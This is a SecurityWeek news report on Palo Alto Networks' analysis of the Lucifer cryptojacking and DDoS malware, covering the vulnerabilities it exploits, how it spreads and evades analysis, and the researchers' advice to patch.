Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cybercrime

Hybrid Malware ‘Lucifer’ Includes Cryptojacking, DDoS Capabilities

A recently identified piece of cryptojacking malware includes functionality that enables its operators to launch distributed denial of service (DDoS) attacks, Palo Alto Networks reports.

A recently identified piece of cryptojacking malware includes functionality that enables its operators to launch distributed denial of service (DDoS) attacks, Palo Alto Networks reports.

Dubbed Lucifer, the malware was first observed on May 29, as part of a campaign that is still ongoing, but which switched to an upgraded variant on June 11.

The threat was designed to drop XMRig for mining Monero, it can propagate on its own by targeting various vulnerabilities, is capable of command and control (C&C) operations, and drops and runs EternalBlue, EternalRomance, and the DoublePulsar backdoor on vulnerable targets for intranet infections.

Lucifer, Palo Alto Networks security researchers reveal, targets a long list of critical and high-severity vulnerabilities, in software such as Rejetto HTTP File Server, Jenkins, Oracle Weblogic, Drupal, Apache Struts, Laravel, and Windows.

Targeted security flaws are CVE-2014-6287, CVE-2018-1000861, CVE-2017-10271, CVE-2018-20062, CVE-2018-7600, CVE-2017-9791, CVE-2019-9081, PHPStudy Backdoor RCE, CVE-2017-0144, CVE-2017-0145, and CVE-2017-8464.

Successful exploitation of these bugs provides attackers with the ability to execute code on the target machines. Although software updates to address these issues have been available for some time, many systems remain unpatched and exposed to attacks.

The malware contains three resource sections, each containing a binary for a specific purpose: x86 and x64 UPX-packed versions of XMRig 5.5.0, and Equation Group exploits (EternalBlue and EternalRomance, and the DoublePulsar backdoor implant).

Once it has infected a machine, Lucifer proceeds to gain persistence by setting specific registry key values. The malware enables itself with debug privilege and begins operation by launching several threads.

Advertisement. Scroll to continue reading.

For propagation, the malware scans for open TCP ports 135 (RPC) and 1433 (MSSQL) and attempts to gain access by trying commonly used credentials, uses Equation Group exploits, or uses HTTP requests to probe for external, exposed systems. The payloads delivered to the identified vulnerable systems fetch a replica of the malware via certutil.

After all worker threads are launched, the malware enters an infinite loop to handle C&C operation. Based on commands received from the server, it can launch TCP/UDP/HTTP DoS attacks, download and execute files, execute commands, enable/disable the miner’s status report functionality, enable flags related to the miner, or reset the flags and terminate the miner.

The Stratum protocol on port 10001 is used for communication between the cryptojacking bot and its mining server.

The upgraded version of the malware has the same capabilities and behavior as its predecessor, but also includes an anti-sandbox capability by checking the username and the computer name of the infected host against a predefined list, as well as for the presence of specific device drivers, DLLs and virtual devices, and halting operation if a match is found. It also includes anti-debugger capabilities.

“Lucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms. Applying the updates and patches to the affected software [is] strongly advised,” Palo Alto Networks concludes.

Related: ‘Graboid’ Crypto-Jacking Worm Targets Docker Hosts

Related: Interpol Announces Successful Operation Against Cryptojacking in Southeast Asia

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Discover strategies for vendor selection, integration to minimize redundancies, and maximizing ROI from your cybersecurity investments. Gain actionable insights to ensure your stack is ready for tomorrow’s challenges.

Register

Dive into critical topics such as incident response, threat intelligence, and attack surface management. Learn how to align cyber resilience plans with business objectives to reduce potential impacts and secure your organization in an ever-evolving threat landscape.

Register

People on the Move

Software giant Atlassian has named David Cross as its new CISO.

Dan Pagel has been named the new CEO of risk management and remediation firm Brinqa.

The City of Phoenix has promoted Mitch Kohlbecker to the role of Chief Information Security Officer.

More People On The Move

Expert Insights

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest cybersecurity news, threats, and expert insights. Unsubscribe at any time.